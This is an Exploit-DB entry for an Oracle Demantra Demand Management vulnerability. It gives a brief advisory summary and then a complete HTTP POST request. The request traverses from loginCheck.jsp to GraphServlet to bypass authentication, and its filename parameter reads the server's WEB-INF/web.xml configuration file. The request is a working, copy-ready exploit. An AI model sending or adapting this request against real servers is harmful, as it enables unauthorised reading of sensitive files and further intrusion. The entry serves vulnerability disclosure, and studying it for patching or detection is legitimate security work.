Oracle Supply Chain Products Suite - Remote Security

EDB-ID:

39018


Author:

Oracle

Type:

remote


Platform:

Multiple

Date:

2014-01-14


source: https://www.securityfocus.com/bid/64836/info

Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.

The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.

Attackers can exploit this issue to obtain sensitive information.

This vulnerability affects the following supported versions:
12.2.0, 12.2.1, 12.2.2

POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml